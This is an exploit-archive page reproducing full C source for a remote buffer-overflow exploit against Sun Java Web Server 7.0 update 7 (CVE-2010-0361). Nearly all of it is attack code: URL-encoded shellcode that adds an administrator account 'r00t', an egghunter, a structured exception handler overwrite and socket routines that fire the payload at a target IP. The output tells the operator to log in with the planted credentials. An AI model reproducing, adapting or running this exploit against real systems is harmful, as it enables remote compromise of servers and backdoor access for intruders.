Home / os / win7

Sun Java Web Sever 7.0 u7 Remote Exploit

Posted on 03 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Sun Java Web Sever 7.0 u7 Remote Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================
Sun Java Web Sever 7.0 u7 Remote Exploit
========================================


/* Sun Java Web Server Exploit
 * Tested on:
 * Sun Java Web Server 7.0 update 7 - XP SP3
 * Ref: CVE-2010-0361
 * This vulnerability was identified by Evgeny Legerov
 *
 * Author: Dominic Chell &lt;dmc@deadbeef.co.uk&gt;
 * Date: 23/01/2010
 */
 
#include &quot;stdafx.h&quot;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;errno.h&gt;
#include &lt;string.h&gt;
#include &quot;winsock2.h&quot;
 
#pragma comment(lib, &quot;ws2_32&quot;)
 
#define usage(){ (void)fprintf(stderr, &quot;SJWSex vs Sun Java Web Server 7.0 u7
(C) dmc &lt;dmc@deadbeef.co.uk&gt;

Example: sjwsex.exe [ip] [port] [directory]
&quot;);}
#define error(e){ (void)fprintf(stderr,&quot;%s
&quot;,e); return -1;}
 
// encoding the payloads in URL hex prevents it getting converted to unicode
char seh[] = &quot;%ee%7b%01%12&quot;; // 0x12017bee
char nextseh[] =&quot;%eb%10%90%90&quot;; // jmp
char *nop = &quot;%90&quot;; // nop
char egghunter[] = &quot;%66%81%CA%FF%0F%42%52%6A%02%58%CD%2E%3C%05%5A%74%EF%B8%77%30%30%74%8B%FA%AF%75%EA%AF%75%E7%FF%E7&quot;;
char *egg = &quot;%77%30%30%74%77%30%30%74&quot;; // w00tw00t
// adduser r00t / r00tr00t123
char shellcode[] =
       &quot;%89%e6%db%cd%d9%76%f4%58%50%59%49%49%49%49%43&quot;
       &quot;%43%43%43%43%43%51%5a%56%54%58%33%30%56%58%34&quot;
       &quot;%41%50%30%41%33%48%48%30%41%30%30%41%42%41%41&quot;
       &quot;%42%54%41%41%51%32%41%42%32%42%42%30%42%42%58&quot;
       &quot;%50%38%41%43%4a%4a%49%4b%4c%4d%38%4b%39%45%50&quot;
       &quot;%45%50%43%30%43%50%4d%59%4b%55%46%51%48%52%42&quot;
       &quot;%44%4c%4b%46%32%50%30%4c%4b%46%32%44%4c%4c%4b&quot;
       &quot;%51%42%44%54%4c%4b%42%52%46%48%44%4f%4f%47%51&quot;
       &quot;%5a%47%56%46%51%4b%4f%50%31%49%50%4e%4c%47%4c&quot;
       &quot;%43%51%43%4c%45%52%46%4c%47%50%49%51%48%4f%44&quot;
       &quot;%4d%43%31%48%47%4d%32%4c%30%46%32%46%37%4c%4b&quot;
       &quot;%50%52%44%50%4c%4b%47%32%47%4c%45%51%48%50%4c&quot;
       &quot;%4b%51%50%43%48%4d%55%49%50%44%34%51%5a%45%51&quot;
       &quot;%48%50%50%50%4c%4b%47%38%44%58%4c%4b%50%58%51&quot;
       &quot;%30%45%51%4e%33%4a%43%47%4c%51%59%4c%4b%47%44&quot;
       &quot;%4c%4b%45%51%4e%36%46%51%4b%4f%46%51%49%50%4e&quot;
       &quot;%4c%49%51%48%4f%44%4d%43%31%48%47%50%38%4b%50&quot;
       &quot;%43%45%4a%54%43%33%43%4d%4b%48%47%4b%43%4d%47&quot;
       &quot;%54%43%45%4a%42%46%38%4c%4b%50%58%46%44%45%51&quot;
       &quot;%48%53%42%46%4c%4b%44%4c%50%4b%4c%4b%50%58%45&quot;
       &quot;%4c%43%31%49%43%4c%4b%44%44%4c%4b%45%51%4e%30&quot;
       &quot;%4d%59%50%44%47%54%46%44%51%4b%51%4b%45%31%50&quot;
       &quot;%59%50%5a%46%31%4b%4f%4b%50%46%38%51%4f%50%5a&quot;
       &quot;%4c%4b%42%32%4a%4b%4b%36%51%4d%43%5a%43%31%4c&quot;
       &quot;%4d%4b%35%4e%59%45%50%43%30%43%30%46%30%43%58&quot;
       &quot;%46%51%4c%4b%42%4f%4d%57%4b%4f%48%55%4f%4b%4b&quot;
       &quot;%50%45%4d%46%4a%45%5a%45%38%49%36%4a%35%4f%4d&quot;
       &quot;%4d%4d%4b%4f%48%55%47%4c%45%56%43%4c%44%4a%4d&quot;
       &quot;%50%4b%4b%4d%30%42%55%44%45%4f%4b%50%47%42%33&quot;
       &quot;%42%52%42%4f%42%4a%43%30%46%33%4b%4f%4e%35%45&quot;
       &quot;%33%42%4d%45%34%46%4e%43%55%44%38%45%35%51%30&quot;
       &quot;%46%4f%43%53%47%50%42%4e%45%35%42%54%51%30%43&quot;
       &quot;%45%42%53%45%35%43%42%51%30%44%32%50%30%46%50&quot;
       &quot;%42%54%51%30%43%42%46%50%46%50%42%54%44%32%50&quot;
       &quot;%30%46%50%43%44%46%51%46%52%46%53%47%50%46%4f&quot;
       &quot;%51%51%50%44%51%54%47%50%51%36%46%46%51%30%42&quot;
       &quot;%4e%43%55%44%34%51%30%42%4c%42%4f%45%33%45%31&quot;
       &quot;%42%4c%43%57%43%42%42%4f%44%35%42%50%47%50%51&quot;
       &quot;%51%42%44%42%4d%45%39%42%4e%43%59%42%53%44%34&quot;
       &quot;%44%32%45%31%43%44%42%4f%43%42%42%53%51%30%42&quot;
       &quot;%52%46%50%46%50%42%54%51%30%46%4f%47%31%50%44&quot;
       &quot;%51%54%45%50%45%5a%41%41&quot;;
 
int send_buffer(int ipaddr, int port, char *buffer)
{
       SOCKET s;
       struct fd_set mask;
       struct timeval timeout;
       struct sockaddr_in server;
       WSADATA info;
       if (WSAStartup(MAKEWORD(2,0), &amp;info)) error(&quot;Unable to start WSA&quot;);
 
       s=socket(AF_INET,SOCK_STREAM,0);
       if (s==INVALID_SOCKET) error(&quot;[*] socket error&quot;);
       server.sin_family=AF_INET;
       server.sin_addr.s_addr=htonl(ipaddr);
       server.sin_port=htons(port);
 
       WSAConnect(s,(struct sockaddr *)&amp;server,sizeof(server),NULL,NULL,NULL,NULL);
       timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&amp;mask);FD_SET(s,&amp;mask);
 
       select(s+1,NULL,&amp;mask,NULL,&amp;timeout);
       if(FD_ISSET(s,&amp;mask))
       {
               if (send(s,buffer,strlen(buffer),0)==SOCKET_ERROR) error(&quot;[*] error sending buffer
&quot;);
               closesocket(s);
               return 0;
       }
}
 
int main(int argc, char *argv[])
{
       char *verb=&quot;GET /&quot;;
       char *options=&quot;OPTIONS /&quot;;
       char *version=&quot; HTTP/1.0&quot;;
       char *directory=&quot;&quot;;
       char *payload, *ptr, *buffer;
       char nops[31], padding[130];
 
       if(argc &lt; 4)
       {
               usage();
               return 0;
       }
 
       memset(nops, 0x00, sizeof(nops));
       memset(padding, 0x00, sizeof(padding));
 
       int ipaddr=htonl(inet_addr(argv[1])), port=atoi(argv[2]);
       directory = argv[3];
       fprintf(stderr, &quot;SJWSex vs Sun Java Web Server 7.0 u7
(C) dmc &lt;dmc@deadbeef.co.uk&gt;

&quot;);
 
       // build payload and place shellcode in memory
       payload = (char*)malloc(strlen(egg)+strlen(shellcode)+strlen(verb)+strlen(version)+2);
       memset(payload, 0x00, sizeof(payload));
       ptr=payload;
 
       memcpy(ptr, verb, strlen(verb));
       ptr+=strlen(verb);
       memcpy(ptr, egg, strlen(egg));
       ptr+=strlen(egg);
       memcpy(ptr, shellcode, strlen(shellcode));
       ptr+=strlen(shellcode);
       memcpy(ptr, version, strlen(version));
       ptr+=strlen(version);
       memcpy(ptr, &quot;
&quot;, 2);
 
       fprintf(stderr, &quot;%s
&quot;, &quot;[*] Filling memory with shellcode&quot;);
       for (int i=0; i&lt;4; i++)
       {
               send_buffer(ipaddr, port, payload);
       }
 
       // build final buffer and overwrite seh
       // [ OPTIONS / | DIRECTORY | PADDING | EGG | SHELLLCODE | NEXTSEH | SEH | NOPS | EGGHUNTER | HTTPVERSION ]
       buffer=(char*)malloc(strlen(options)+strlen(directory)+strlen(egg)+strlen(shellcode)+strlen(nextseh)+strlen(seh)+strlen(egghunter)+strlen(version)+163);
       memset(buffer, 0x00, sizeof(buffer));
       ptr=buffer;
 
       memcpy(ptr, options, strlen(options));
       ptr+=strlen(options);
       memcpy(ptr, directory, strlen(directory));
       ptr+=strlen(directory);
       memcpy(ptr, &quot;/&quot;, 1);
       ptr++;
 
       for(int i=0;i&lt;129;i++)
               padding[i] = 'A';
 
       memcpy(ptr, padding, strlen(padding));
       ptr+=strlen(padding);
 
       memcpy(ptr, egg, strlen(egg));
       ptr+=strlen(egg);
 
       memcpy(ptr, shellcode, strlen(shellcode));
       ptr+=strlen(shellcode);
 
       memcpy(ptr, nextseh, strlen(nextseh));
       ptr+=strlen(nextseh);
 
       memcpy(ptr, seh, strlen(seh));
       ptr+=strlen(seh);
 
       for(int i=0;i&lt;10;i++)
               strcat(nops, nop);
       memcpy(ptr, nops, strlen(nops));
       ptr+=strlen(nops);
 
       memcpy(ptr, egghunter, strlen(egghunter));
       ptr+=strlen(egghunter);
 
       memcpy(ptr, version, strlen(version));
       ptr+=strlen(version);
       memcpy(ptr, &quot;

&quot;, 3);
 
       fprintf(stderr, &quot;%s
&quot;, &quot;[*] Sending final buffer&quot;);
       send_buffer(ipaddr, port, buffer);
       fprintf(stderr, &quot;%s
&quot;, &quot;[*] Wait 2 minutes and connect with r00t / r00tr00t123&quot;);
 
       return 0;
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :